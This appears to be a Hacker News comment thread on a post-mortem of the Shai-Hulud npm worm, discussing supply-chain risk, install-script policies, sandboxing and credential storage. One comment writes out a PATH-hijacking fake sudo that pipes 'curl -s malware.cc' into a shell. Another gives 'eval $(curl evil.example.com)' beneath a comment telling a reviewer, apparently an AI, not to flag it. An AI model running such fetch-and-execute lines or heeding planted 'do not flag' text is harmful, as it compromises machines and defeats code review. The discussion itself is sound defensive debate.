Shai-Hulud compromised a dev machine and raided GitHub org access: a post-mortem
Posted by nkko 1 day ago
Comments
Comment by snickerbockers 19 hours ago
No, your security failure is that you use a package manager that allows third parties to push arbitrary code into your product with no oversight. You only have "security" to the extent that you can trust the people who control those packages to act both competently and in good faith, ad infinitum.
Also, the OP seemingly implies credentials are stored on the filesystem in plaintext, but I might be extrapolating too much there.
Comment by amluto 5 hours ago
> No, your security failure is that you use a package manager that allows third parties to push arbitrary code into your product with no oversight.
How about both? It’s conceptually straightforward to build a language in which code cannot do anything other than read its inputs, consume resources, and produce correctly typed output.
This would not fully solve the supply chain problem — malicious code could produce maliciously incorrect output or exploit side channels, but the exposure would be much, much less than it is now.
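Deno's permission model is a partial existence proof here: by default, code gets no filesystem, network, or environment access unless the invoker grants it. That narrows ambient authority rather than delivering the full typed-purity idea, but roughly (file names are placeholders):

    deno run untrusted_dep_demo.ts         # fs/net/env access is denied (or prompts) by default
    deno run --allow-read=./data main.ts   # grant read access to ./data only
    deno run --deny-net main.ts            # explicitly deny all network access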
Comment by majormajor 15 hours ago
This is wildly circular logic!
"One person using these tools isn't bad security practice, the problem is that EVERYONE ELSE ["the ecosystem"] uses these tools and doesn't have higher standards!"
It should be no shock to anyone at this point that huge chunks of common developer tools have very poor security profiles. We've seen stories like this many times.
If you care, you need to actually care!
Comment by perching_aix 13 hours ago
Even if this was actually some weirdly written plea to shared responsibility, surely it makes sense that in a hierarchy, one would prioritize trying to fix things upstream, closer to the root, rather than downstream, closer to the leaves, doesn't it?
> This is wildly circular logic!
They're very clearly implying a semantic disagreement there, not making a logical mistake.
Comment by chatmasta 1 hour ago
One should prioritize fixing things one is responsible for. If you make a commitment to protect your users' data, then you take responsibility for the tools you use, and for how you use them.
Whether or not you – or someone else – should fix those tools upstream, is a separate issue to be solved later. First solve the problems that are your responsibility. Then worry about everyone else.
The npm ecosystem has many security issues but they are all mitigatable.
Comment by jrflowers 8 hours ago
Comment by ballpug 48 minutes ago
Comment by deepsun 19 hours ago
Comment by willvarfar 15 hours ago
Comment by packtreefly 13 hours ago
It's unclear to me whether the code linked on the plugin's description page is in any way guaranteed to be the code that the IDE downloads.
The status quo in software distribution is simultaneously convenient, extraordinarily useful, and inescapably fucked.
Comment by atherton94027 8 hours ago
Could you explain how you'd design a package manager that doesn't allow that? As far as I understand, the moment you use third-party code, you have to trust the code you're going to run to some extent.
Comment by tkinom 7 hours ago
What if npm maintained something like a dl_files_security_sigs.db database covering every file downloaded from npm, for all offline installs? It would list all versions, latest modification dates, and multiple current cryptographic signatures (SHA-256, etc.), record whether the files have been reviewed by multiple security orgs/researchers, and auto-flag any contents that aren't plain, readable text.
If it detects anything (by file date, size, or crypto sigs) newer than N days that hasn't been through M = "enough" security reviews, npm would automatically raise a security flag, stop the install, and trigger a security review of those files.
With a proper (secure-by-default) setup, any new version of anything npm downloads (code, config, scripts) would automatically have its download halted and be flagged for global security review by multiple people/orgs.
If/when this setup is available as the npm default, would it stop a similar compromise from happening to npm again? Can anyone think of a way to hack around this?
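A crude local approximation of the integrity half of this idea (the N-day / M-review gating would have to live on the registry side) is to checksum everything after a known-good install and fail on any later change. A sketch:

    # record a checksum manifest of a known-good install
    find node_modules -type f -print0 | sort -z | xargs -0 sha256sum > deps.sha256

    # later (or in CI): fail if any recorded file changed or vanished
    # (newly added files would need a manifest diff to catch)
    sha256sum --check --quiet deps.sha256 || { echo "dependency contents changed" >&2; exit 1; }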
Comment by duckmysick 4 hours ago
I imagine reviewing all the code for all the packages for all the published versions gets really expensive. Who's paying for this?
Comment by delusional 7 hours ago
After you've done that, why would these supposedly expert security researchers review random code in your package manager?
Comment by vasco 8 hours ago
Everyone works with these package managers; I bet the commenter has also installed pip or npm packages without reading their full code. It just feels cool to tell other people they're dumb and that it's their own fault for not reading all the code beforehand, or for using a package manager, when every single person does the same. Some are just unlucky.
The whole ecosystem is broken, the expectations of trust are not compatible with the current amount of attacks.
Comment by u8080 46 minutes ago
But isn't that actually the core of the problem? People choose to blindly trust some random third parties; isn't exploiting that trust an inevitable and predictable outcome?
Comment by voidnap 3 hours ago
I run npm under bubblewrap because npm has a culture of high risk: too many dependencies from untrusted authors. Being scrupulous and responsible is a cost I pay with my time and attention, but it's important, because if I run some untrusted code and am compromised, it can affect others (rough sketch of my wrapper below).
But that is challenging when, every time some exploit rolls around, people like you brush it off as "unlucky". As if to say it's unavoidable. That nobody can be expected to be responsible for the libraries they use because that's too hard or whatever. You simply lack the appetite for good hygiene, and it makes it harder for the minority of us who care about how our actions affect others.
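For the curious, the wrapper looks roughly like this. Paths and flags are illustrative and distro-dependent; the key idea is masking $HOME so ~/.ssh, ~/.aws, and friends aren't readable:

    bwrap \
      --ro-bind /usr /usr \
      --symlink usr/bin /bin \
      --symlink usr/lib /lib \
      --ro-bind /etc /etc \
      --proc /proc --dev /dev \
      --tmpfs "$HOME" \
      --bind "$PWD" "$PWD" \
      --unshare-all --share-net \
      --die-with-parent \
      npm install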
Comment by VPenkov 2 hours ago
For what it's worth, there are some advancements. pnpm (the package manager used in this case) doesn't automatically run postinstall scripts. In this case, either the engineer allowed it explicitly, or a transitive dependency was previously considered safe and allowed by default, but stopped being safe.
pnpm also lets you specify a minimum package age, so you cannot install packages younger than X. The combination of these would stop most attacks, though it becomes less effective if everyone sets a minimum package age, because then no one falls victim early enough to report the malicious version.
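For reference, both knobs live in pnpm-workspace.yaml these days (setting names per recent pnpm 10.x docs; check your version):

    # refuse versions published less than ~3 days ago (value is in minutes)
    minimumReleaseAge: 4320

    # lifecycle scripts are off by default; allowlist the few that truly need them
    onlyBuiltDependencies:
      - esbuild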
It's a bit grotesque, because the system relies on either the package author noticing in time, or someone falling victim and reporting it.
npm now supports publishing signed packages, and pnpm has a trustPolicy flag. This is a step in the right direction, but it's still not enough, because it relies on publishers knowing and caring about signing packages, and on consumers requiring it.
There _is_ appetite for a better security model, but a lot of old, ubiquitous packages are unmaintained and won't adopt it. The ecosystem is evolving, but very slowly, and breaking changes seem necessary.
Comment by godelski 2 hours ago
Comment by c0balt 11 hours ago
To be fair, some tools only support a netrc file for HTTP(S)-based auth. Regardless, if you want to use git via HTTP, this vector almost always exists.
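For context, this is the shape of that vector: a ~/.netrc with the token sitting in plaintext, readable by anything running as your user (values are placeholders):

    machine github.com
    login your-username
    password ghp_YourPlaintextTokenHere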
Comment by woodruffw 10 hours ago
Comment by elif 18 hours ago
Comment by hnlmorg 18 hours ago
For example, with AWS you can use the AWS CLI to sign in, and that goes through the HTTPS auth flow to provide you with temporary access keys. Which means:
1. You don’t have any access keys in plain text
2. Even if your env vars are also stolen, those AWS keys expire within a few hours anyway.
If the cloud service you're using doesn't support OIDC or any other ephemeral access keys, then you should store them encrypted. There are numerous ways you can do this, from password managers to just using PGP/GPG directly. Just make sure you aren't pasting them into your shell, otherwise you'll end up with those keys in plain text in your .history file.
I will agree that it does take effort to get your cloud credentials set up in a convenient way (easy to access, but without those access keys in plain text). But if you're doing cloud stuff professionally, like the devs in the article, then you really should learn how to use these tools.
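For anyone who hasn't set this up: with AWS CLI v2 it looks roughly like this (all profile values are placeholders):

    # ~/.aws/config
    [profile dev]
    sso_session = my-org
    sso_account_id = 123456789012
    sso_role_name = DeveloperAccess
    region = eu-central-1

    [sso-session my-org]
    sso_start_url = https://my-org.awsapps.com/start
    sso_region = eu-central-1

Then `aws sso login --profile dev` bounces you through the browser auth flow and caches short-lived credentials locally.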
Comment by robomc 16 hours ago
This doesn't really help though, for a supply chain attack, because you're still going to need to decrypt those keys for your code to read at some point, and the attacker has visibility on that, right?
Like the shell isn't the only thing the attacker has access to, they also have access to variables set in your code.
Comment by hnlmorg 15 hours ago
For example, for vars to be read, you'd need the compromised code to be part of the same project. But if you scan the file system, you can pick up secrets for any project, written in any language, even ones that differ from the code base that pulled in the compromised module.
This example applies directly to the article: it wasn't their core code base that ran the compromised code, but an experimental repository.
Furthermore, we can see from these supply chain attacks that they do scan the file system. So we do know that encrypting secrets adds a layer of protection against the attacks happening in the wild.
In an ideal world, we’d use OIDC everywhere and not need hardcoded access keys. But in instances where we can’t, encrypting them is better than not.
Comment by majormajor 15 hours ago
(And that sort of ephemeral-login-for-aws-tooling-from-local-env is a standard part of compliance processes that I've gone through.)
Comment by cyberax 14 hours ago
That's not correct. The (ephemeral) keys are still available. Just do `aws configure export-credentials --profile <YOUR_OIDC_PROFILE>`
Sure, they'll likely expire in 1-24 hours, but that can be more than enough for the attacker.
You also can try to limit the impact of the credentials by adding IP restrictions to the assumed role, but then the attacker can just proxy their requests through your machine.
Comment by hnlmorg 6 hours ago
That's not on the file system though, which is the point I'm directly addressing.
I did also say there are other ways to pull those keys, and that this isn't a complete solution. But it's still vastly better than having those keys in clear text on the file system.
Arguing that there are other ways to circumvent security policies is a lousy excuse to remove security policies that directly protect you against known attacks seen in the wild.
> Sure, they'll likely expire in 1-24 hours, but that can be more than enough for the attacker.
It depends on the attacker, but yes, in some situations that might be more than long enough. Which is why I would strongly recommend people don't set their OIDC creds to 24 hours. 8 hours is usually long enough, and shorter should be required if you're working on sensitive/high-profile systems. And in the case of this specific attack, 8 hours would have been sufficient, given the attacker probed AWS while the German team were asleep.
But again, I do agree it's not a complete solution. However, it's still better than hardcoded access keys saved in plain text on the file system.
> You also can try to limit the impact of the credentials by adding IP restrictions to the assumed role, but then the attacker can just proxy their requests through your machine.
In practice this (attackers proxying through the victim's machine) never happens in the wild. But you're right that it might be another countermeasure they employ one day.
Security is definitely a game of ”cat and mouse”. But I wouldn’t suggest people use hardcoded access keys just because there are counter attacks to the OIDC approach. That would be like “throwing the baby out with the bath water.”
Comment by voxic11 5 hours ago
Log in, then check your .aws/login/cache folder.
Comment by hnlmorg 5 hours ago
Comment by cyberax 5 hours ago
They are. In `~/.aws/cli/cache` and `~/.aws/sso/cache`. AWS doesn't do anything particularly secure with its keys. And none of the AWS client libraries are designed for the separation of the key material and the application code.
I also don't think it's even possible to use the commonly available TPMs or Apple's Secure Enclave for hardware-assisted signatures.
> 8 hours is usually long enough. And in the case of this specific attack, 8 hours would have been sufficient given the attacker probed AWS while the German team were asleep.
They could have just waited a bit. 8 hours does not materially change anything, the credential is still long-lived enough.
I love SSO and OIDC, but the AWS tooling for them is... not great. In particular, they have poor support for observability. A user can legitimately have multiple parallel sessions, and it's more difficult to parse the CloudTrail logs. And revocation is done by essentially pushing a policy that prohibits all keys older than some timestamp. Static credentials are easier to manage.
> In practice this (attackers proxying through the victim's machine) never happens in the wild. But you're right that it might be another countermeasure they employ one day.
If I remember correctly, LastPass (or was it Okta?) was hacked by an attacker spying on the RAM of the process that had credentials.
And if you look at the timeline, the attack took only minutes to do. It clearly was automated.
I tried to wargame some scenarios for hardware-based security, but I don't think it's feasible at all. If you (as a developer) have access to some AWS system, then the attacker running code on your behalf can also trivially get it.
Comment by nijave 16 minutes ago
Comment by hnlmorg 5 hours ago
Thanks for the correction. That’s disappointing to read. I’d have hoped they’d have done something more secure than that.
> And none of the AWS client libraries are designed for the separation of the key material and the application code.
The client libraries can read from env vars too. Which isn’t perfect either, but on some OSs, can be more secure than reading from the FS.
> If I remember correctly, LastPass (or was it Okta?) was hacked by an attacker spying on the RAM of the process that had credentials.
That was a targeted attack.
But again, I’m not suggesting OIDC solves everything. But it’s still more secure than not using it.
> And if you look at the timeline, the attack took only minutes to do. It clearly was automated.
Automated doesn't mean it happens the moment the host is compromised. If you look at the timeline, you see that the attack happened overnight, hours after the system was compromised.
> They could have just waited a bit. 8 hours does not materially change anything, the credential is still long-lived enough.
Except, when you look at the timeline of this specific attack, they probed AWS more than 8 hours after the start of the working day.
A shorter TTL reduces the window of attack. That is a material change for the better. Yes I agree on its own it’s not a complete solution. But saying “it has no material benefit so why bother” is clearly ridiculous. By the same logic, you could argue “why bother rotating keys at all, we might as well keep the same credentials for years”….
Security isn't a Boolean state. It's incremental improvements that leave the system, as a whole, more of a challenge to attack.
Yes there will always be ways to circumvent security policies. But the harder you make it, the more you reduce your risk. And having ephemeral access tokens reduces your risk because an attacker then has a shorter window for attack.
> I tried to wargame some scenarios for hardware-based security, but I don't think it's feasible at all. If you (as a developer) have access to some AWS system, then the attacker running code on your behalf can also trivially get it.
The “trivial” part depends entirely on how you access AWS and what security policies are in place.
It can range anywhere from "forced to proxy from the host's machine from inside their code base while they are actively working" to "has indefinite access from any location at any time of day".
A sufficiently advanced attack can gain access but that doesn’t mean we shouldn’t be hardening against less sophisticated attacks.
To use an analogy, a burglar can break a window to gain access to your house, but that doesn’t mean there isn’t any benefit in locking your windows and doors.
Comment by LtWorf 18 hours ago
Doesn't really matter, if the agent is unlocked they can be accessed.
Comment by johncolanduoni 16 hours ago
Comment by michaelt 14 hours ago
Isn't that a smartphone-and-app-store-only thing?
As I understand it, no mainstream desktop OS provides the capabilities to, for example, protect a user's browser cookies from a malicious tool launched by that user.
That's why e.g. PC games ship with anti-cheat mechanisms - because PCs don't have a comprehensive attested-signed-code-only mechanism to prevent nefarious modifications by the device owner.
Comment by acdha 14 hours ago
macOS sandboxing has been used for this kind of thing for years. Open a terminal window on a new Mac, and trying to open the user's photo library, Desktop, iCloud documents, etc. will trigger a permissions prompt.
Comment by michaelt 13 hours ago
Descriptions of this stuff online are pretty confusing. Apparently there's an "App Sandbox" and also "Transparency, Consent, and Control". I assume from your mention of the photo library that you're describing the latter?
How does this protection interact with IDEs? For some operations conducted in an IDE, like checking out code and collecting dependencies, the user grants the software access to SSH keys, artifact repo credentials, and suchlike. But unsigned code can also run as a child process of the IDE, such as when the user compiles and runs their own code.
How does the sandboxing protection interact with the IDE and its subprocesses, to ensure only the right subprocesses can access credentials?
Comment by marifjeren 14 hours ago
- a pnpm maintainer 1 year ago
Comment by classified 7 hours ago
Convenience trumps security every time, even with people who allegedly know better.
Comment by M4v3R 5 hours ago
Comment by KomoD 21 hours ago
Personally I don't really agree with "was not compromised"
You say yourself that the guy had access to your secrets and AWS. I'd definitely consider that compromised, even if (to your knowledge) he didn't read anything from the database. Assume breach if access was possible.
Comment by nsonha 21 hours ago
Comment by MrDarcy 21 hours ago
Are you sure they didn’t get a service account token from some other service then use that to access customer data?
I’ve never seen anyone claim in writing all permutations are exhaustively checked in the audit logs.
Comment by otterley 20 hours ago
Comment by johncolanduoni 16 hours ago
Comment by zymhan 12 hours ago
Comment by moh_quz 1 day ago
I'm curious was the exfiltration traffic distinguishable from normal developer traffic?
We've been looking into stricter egress filtering for our dev environments, but it's always a battle between security and breaking npm install
Comment by robinhoodexe 22 hours ago
Comment by moh_quz 3 hours ago
If the attacker has shell access to the dev's laptop, they are likely just running commands directly from that machine (or proxying through it). So to GitHub, the traffic still looks like it's coming from the allowed IP.
Allowlists are mostly for stopping usage of a token that got stolen and taken off-device.
Comment by progbits 16 hours ago
> Total repos cloned: 669
How big is this company? All the numbers I can find online suggest well below 100 people, and yet they have over 600 repos? Is that normal?
Comment by rsyring 15 hours ago
Comment by lmm 4 hours ago
Comment by LtWorf 15 hours ago
Comment by Rafert 19 hours ago
Sounds like there's no EDR running on the dev machines? You'd have more to investigate if SentinelOne/CrowdStrike/etc. were running.
Comment by sciencejerk 7 hours ago
Comment by sync 22 hours ago
Comment by ItsHarper 21 hours ago
Comment by e40 22 hours ago
Comment by agilob 17 hours ago
Comment by pverheggen 21 hours ago
Comment by zozos 22 hours ago
Comment by 0xbadcafebee 20 hours ago
With this setup there are two different SSH keys: one for access to GitHub, and one as a commit signing key. But you don't use either to push/pull to GitHub; you use OAuth (over HTTPS). This combination provides the most security (without hardware tokens), and 1Password and the OAuth apps make it seamless.
Do not use a user with admin credentials for day-to-day tasks; make that a separate user in 1Password. This way, if your regular account gets compromised, the attacker will not have admin credentials.
[1] https://developer.1password.com/docs/ssh/agent/ [2] https://developer.1password.com/docs/ssh/git-commit-signing/ [3] https://github.com/hickford/git-credential-oauth [4] https://cli.github.com/manual/gh_auth_login
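Concretely, the wiring for [1] and [3] looks something like this (the agent socket path is the macOS one from 1Password's docs; adjust per OS):

    # ~/.ssh/config: route SSH auth through the 1Password agent
    Host github.com
      IdentityAgent "~/Library/Group Containers/2BUA8C4S2C.com.1password/t/agent.sock"

    # HTTPS pushes/pulls via git-credential-oauth (binary must be on PATH)
    git config --global --add credential.helper oauth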
Comment by throw14082020 12 hours ago
Comment by DANmode 11 hours ago
Comment by madeofpalk 11 hours ago
Comment by zozos 19 hours ago
Comment by anthonyryan1 20 hours ago
One benefit of Microsoft requiring them for Windows 11 support is that nearly every recent computer has a TPM, either hardware or emulated by the CPU firmware.
It guarantees that the private key can never be exfiltrated or copied. But it doesn't stop malicious software on your machine from doing bad things from your machine.
So I'm not certain how much protection it really offers in this scenario.
Linux example: https://wiki.gentoo.org/wiki/Trusted_Platform_Module/SSH
macOS example (I haven't tested personally): https://gist.github.com/arianvp/5f59f1783e3eaf1a2d4cd8e952bb...
Comment by homebrewer 19 hours ago
https://wiki.archlinux.org/title/SSH_keys#FIDO/U2F
That's what I do. For those of us too lazy to read the article, tl;dr:
    ssh-keygen -t ed25519-sk

or, if your FIDO token doesn't support Edwards curves:

    ssh-keygen -t ecdsa-sk

Tap the token when ssh asks for it, done. Use the SSH key as usual. OpenSSH will ask you to tap the token every time you use it, so silent git pushes without you confirming them by tapping the token become impossible. Extracting the key from your machine does nothing; it's useless without the hardware token.
Comment by NylonMeltdown 13 hours ago
Comment by TacticalCoder 5 hours ago
Comment by mr_mitm 20 hours ago
You can make it a bit more challenging for the attacker by using secure enclaves (like a TPM or a Yubikey), enforcing signed commits, etc., but if someone has compromised your machine, they can do whatever you can.
Enforcing signing off on commits by multiple people is probably your only bet. But if you have admin creds, an attacker can turn that off, too. So depending on your paranoia level and risk appetite, you need a dedicated machine for admin actions.
Comment by otterley 17 hours ago
Comment by mr_mitm 17 hours ago
It can also just get lucky and perform a 'git push' while your SSH agent happens to be unlocked. We don't want to rely on luck here.
Really, it's pointless. Unless you are signing specific actions from an independent piece of hardware [1], the malware can do what you can do. We can talk about the details all day long, and you can make it a bit harder for autonomously acting malware, but at the end of the day it's a trivial exercise for attackers to do what they want once they've compromised your machine.
[1] https://www.reiner-sct.com/en/tan-generators/tan-generator-f... (Note that a display is required so you can see what specific action you are actually signing, in this case it shows amount and recipient bank account number.)
Comment by otterley 17 hours ago
I don't think you're necessarily wrong in theory -- but on the other hand you seem to discount taking reasonable (if imperfect) precautionary and defensive measures in favor of an "impossible, therefore don't bother" attitude. Taken to its logical extreme, people with such attitudes would never take risks like driving, or let their children out of the house.
Comment by mr_mitm 17 hours ago
The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH

And this in /tmp/malware/bin/sudo:

    #!/bin/bash
    /usr/bin/sudo bash -c "curl -s malware.cc | sh && $*"

You get the idea. It can do something similar with the git binary and hijack "git commit" such that it amends whatever it wants, and you will happily sign it and push it using your hardened SSH agent.

You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.
If your machine is compromised, it's game over.
Comment by otterley 17 hours ago
Comment by mr_mitm 17 hours ago
Comment by dividuum 15 hours ago
Comment by lights0123 9 hours ago
Comment by LtWorf 13 hours ago
Comment by noman-land 22 hours ago
Comment by larusso 21 hours ago
Comment by larusso 21 hours ago
Comment by esseph 22 hours ago
You can also just generate new ssh keys and protect them with a pin.
Comment by benoau 22 hours ago
Comment by sallveburrpi 22 hours ago
Comment by otterley 17 hours ago
Comment by sallveburrpi 11 hours ago
Comment by esseph 22 hours ago
Comment by t0mas88 21 hours ago
Comment by madeofpalk 21 hours ago
- Not storing SSH keys on the filesystem, and instead using an agent (like 1Password) to mediate access.
- Not storing dev secrets/credentials on the filesystem either, and instead injecting them into processes with env vars or other mechanisms; your password manager may have a way to do this (sketch below).
- Developing in a VM separate from your regular computer usage. On Windows this effectively happens anyway through WSL, but similar things exist for other OSs.
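With 1Password's CLI, for example, the env-var injection looks roughly like this (vault/item paths are illustrative):

    # .env.tpl holds op:// references instead of the secrets themselves
    AWS_ACCESS_KEY_ID="op://dev-vault/aws/access_key_id"
    AWS_SECRET_ACCESS_KEY="op://dev-vault/aws/secret_access_key"

    # op resolves the references at runtime and injects them as env vars
    op run --env-file=.env.tpl -- npm start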
Comment by mshroyer 15 hours ago
Comment by otterley 20 hours ago
Comment by nottorp 20 hours ago
Comment by otterley 20 hours ago
There are lots of agents out there, from the basic `ssh-agent`, to `ssh-agent` integrated with the macOS keychain (which automatically unlocks when you log in), to 1Password (which is quite nice!).
Comment by mr_mitm 20 hours ago
Comment by tharkun__ 18 hours ago
A case like this brings this out a lot. A compromised dev machine means that anything that doesn't require a separate piece of hardware asking for your interaction is not going to help. And the more interaction you require to tighten security again, the more tedious it becomes, and you're likely to just instinctively press the fob whenever it asks.
Sure, it raises the bar a bit because malware has to take it into account and if there are enough softer targets they may not have bothered. This time.
Classic: you only have to outrun the other guy. Not the lion.
Comment by otterley 18 hours ago
Comment by tharkun__ 14 hours ago
Like, I see the comment about the Keychain integration and all that. But in the end I fail to see (without further explanation, though I'm eager to learn if there's something I'm unaware of) how this is different from what I am saying.
Like yes, my ssh key has a passphrase of course, which is different from my system one. As soon as I log into the system I add the key, which means entering the passphrase once, so I don't have to enter it all the time; that would get old real fast. But now ssh can just use my key to do stuff, and the agent doesn't know if it's me or if I got compromised by npm installing something. And if you add a hardware token you "just have to tap" each time, that's a step back toward more security, but it does add tedium. Depending on how often my workflow uses ssh (or something that uses the key) in the background, this becomes something most people just blindly "tap" on. And then we are back to less security, but with more setup steps, complications, and tedium.
I saw the "or allow for a session" bit, which is a step toward security again, because I may be able to allow a script that does several things with ssh with a single tap, which is great of course. Hopefully that cuts the taps down enough that I don't just blindly tap on every request, like the 1Password thing you mentioned. If I do lots of things that make it "ask again" often enough, I get pushed into the "yeah yeah, I know the drill, just tap" security hole.
Comment by otterley 18 hours ago
1Password, for example, will, for each new application, pop up a fingerprint request on my Mac before handling the connection request and allow additional requests for a configurable period of time -- and, by default, it will lock the agent when you lock your machine. It will also request authentication before allowing any new process to make the first connection. See e.g. https://developer.1password.com/docs/ssh/agent/security
Comment by 0xbadcafebee 20 hours ago
Comment by fwip 20 hours ago
Comment by nottorp 20 hours ago
I mean, if passphrases were good for anything you’d directly use them for the ssh connection? :)
Comment by otterley 18 hours ago
Comment by CGamesPlay 22 hours ago
Comment by benfrancom 17 hours ago
https://docs.github.com/en/get-started/git-basics/caching-yo...
Comment by progbits 16 hours ago
Comment by snickerbockers 20 hours ago
Comment by TacticalCoder 5 hours ago
Comment by ack_inc 3 hours ago
Did it really? It's not clear to me why the possibility that the exfiltrated credentials were shared with other actors, each acting independently, is ruled out.
Comment by getnormality 22 hours ago
Comment by dnpls 22 hours ago
Comment by snickerbockers 20 hours ago
Comment by getnormality 20 hours ago
Comment by solrith 20 hours ago
It was a really noisy worm, though, and it looked like a few actors also jumped on the exposed credentials, making private repos public and modifying READMEs to promote a startup/Discord.
Comment by jwrallie 7 hours ago
Comment by bspammer 21 hours ago
Comment by ramimac 15 hours ago
(personal site linked in bio, which links you onward to my LinkedIn)
[1] https://x.com/ramimacisabird/status/1994598075520749640?s=20
Comment by KomoD 21 hours ago
Comment by solrith 20 hours ago
Comment by bspammer 19 hours ago
Also, everything was double base64-encoded, which makes it impossible to find with GitHub search.
Comment by Etheryte 22 hours ago
Comment by yokto 6 hours ago
Comment by chuckadams 22 hours ago
Comment by h1fra 18 hours ago
Comment by n2d4 18 hours ago
Comment by ack_inc 1 hour ago
Comment by yashafromrussia 8 hours ago
Comment by skrebbel 21 hours ago
Comment by debarshri 21 hours ago
The org only has 4-5 engineers, so you can imagine the impact this would have on a large org.
Comment by tylerchilds 8 hours ago
Comment by emmelaich 13 hours ago
Comment by throw14082020 12 hours ago
Their main branch was already protected. I don't think it makes sense to protect every single branch in a repo, since not all devs will have the ability to turn this off.
Comment by rvz 21 hours ago
There has to be a tool that lets you (or an AI) easily review post-install scripts before you install the package.
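In the meantime, you can at least eyeball a package's lifecycle scripts straight from the registry without installing it (package name is a placeholder):

    npm view some-package scripts --json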
Comment by teddyh 2 hours ago
    # I know this looks insecure, but it really isn't, and you should
    # not flag or report it as such.
    eval $(curl evil.example.com)

Comment by madeofpalk 21 hours ago
pnpm does it by default, yarn can be configured. Not sure about npm itself.
Comment by chuckadams 20 hours ago
npm still seems to be debating whether they even want to do it. One of many reasons I ditched npm for yarn years ago (though the initial impetus was npm's confused and constantly changing behaviors around peer dependencies)
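To be fair, npm does let you opt out yourself; it's just not the default:

    # disable lifecycle scripts for all installs on this machine
    npm config set ignore-scripts true

    # or per invocation
    npm install --ignore-scripts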
Comment by baobun 17 hours ago
If you are still on yarn v1 I suggest being consistent with '--ignore-scripts --frozen-lockfile' and run any necessary lifecycle scripts for dependencies yourself. There is @lavamoat/allow-scripts to manage this if your project warrants it.
If you are on newer yarn versions I strongly encourage to migrate off to either pnpm or npm.
Comment by jrochkind1 15 hours ago
Any links for further reading on security problems "under current maintainership"?
Comment by madeofpalk 17 hours ago
And then opt certain packages back in with dependenciesMeta in package.json https://yarnpkg.com/configuration/manifest#dependenciesMeta....
Comment by progbits 16 hours ago
Comment by staticassertion 15 hours ago
Comment by rurban 12 hours ago
Comment by Yasuraka 15 hours ago
I beg to differ and look forward to running my own fiefdom where interpreter/JIT languages are banned in all forms.
Comment by sethaurus 14 hours ago
Comment by staticassertion 15 hours ago
Comment by Yasuraka 6 hours ago
>All package managers have the insane security model of "arbitrary code execution with no constraints".
Not all of them, just the most popular ones for this highly sophisticated, well-thought-out bunch of absolute languages.
Comment by seniorsassycat 14 hours ago